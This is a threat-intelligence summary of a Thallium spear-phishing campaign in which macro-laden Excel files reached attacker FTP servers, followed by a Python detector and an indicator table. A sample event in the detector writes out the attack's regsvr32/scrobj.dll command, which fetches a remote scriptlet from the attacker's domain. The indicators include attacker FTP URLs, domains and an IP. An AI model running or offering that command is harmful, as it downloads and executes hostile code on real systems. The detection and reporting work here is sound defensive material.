Thallium organization conducts spear phishing attack impersonating 2021 COVID-19 response donation certificate

2021-01-24 ESTSecurity Thallium organization conducts spear phishing attack impersonating 2021 COVID-19 response donation certificate

https://blog.alyac.co.kr/3536

ESTsecurity ESRC reported a Thallium spear-phishing campaign timed around Korean year-end tax settlement activity and disguised as a 2021 COVID-19 donation-certificate request. The lure email delivered a ZIP containing a benign-looking PDF and an Excel binary workbook; enabling macros caused the workbook to contact attacker-controlled FTP infrastructure and execute a remote script through regsvr32 and scrobj.dll. The source identifies kvz.factorgpu[.]com and passive DNS address 23.106.160[.]32, linking the activity to a prior Thallium case that used similar malicious-document TTPs and the same last-modifier account. ESRC characterizes Thallium as an active threat actor in Korea using supply-chain attacks, fake servers, and spear phishing across multiple sectors.
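As an added detection example (not from the ESRC report), the following Python scans process-creation events for the regsvr32 + scrobj.dll remote-scriptlet pattern described above, with the Office parent process and the report's domain as supporting signals; the log events are constructed for illustration.

```python
import re

# Constructed sample process-creation events for demonstration (not from the
# report). The first mirrors the technique the report describes: Excel macro ->
# regsvr32 fetching a remote scriptlet over FTP and running it via scrobj.dll.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:ftp://kvz.factorgpu.com/x.sct scrobj.dll",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\legit.dll",
     "parent": r"C:\Windows\System32\msiexec.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo hello",
     "parent": r"C:\Windows\explorer.exe"},
]

# /i:<url> with a remote scheme is the giveaway; scrobj.dll is the script host.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*(?:https?|ftp)://", re.IGNORECASE)
OFFICE_PARENTS = ("excel.exe", "winword.exe", "powerpnt.exe")
KNOWN_BAD_DOMAINS = {"kvz.factorgpu.com"}  # taken from the report's IoC list


def classify(event):
    """Return the reasons this regsvr32 event is suspicious (empty if none)."""
    reasons = []
    if not event["image"].lower().endswith("regsvr32.exe"):
        return reasons
    cmd = event["cmdline"].lower()
    if "scrobj.dll" in cmd and REMOTE_SCRIPTLET.search(cmd):
        reasons.append("regsvr32 executing a remote scriptlet via scrobj.dll")
    if any(domain in cmd for domain in KNOWN_BAD_DOMAINS):
        reasons.append("command line references a known Thallium domain")
    if event["parent"].lower().endswith(OFFICE_PARENTS):
        reasons.append("spawned by an Office application (macro-launched)")
    return reasons


def scan(events):
    """Return (index, reasons) for every event that triggers at least one reason."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

Only the first constructed event is flagged; the legitimate installer-driven regsvr32 call and the unrelated cmd.exe event produce no reasons.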

Indicators of Compromise

Type    Value                            First Seen  Last Seen
EMAIL   [email protected]                2021-01-24  2021-01-24
URL     ftp://mufasa:[email protected]   2021-01-24  2021-01-24
URL     ftp://mufasa:[email protected]   2021-01-24  2021-01-24
DOMAIN  kvz.factorgpu.com                2021-01-24  2021-01-24
IPv4    23.106.160.32                    2021-01-24  2021-01-24
DOMAIN  search.greenulz.com              2021-01-03  2021-01-24
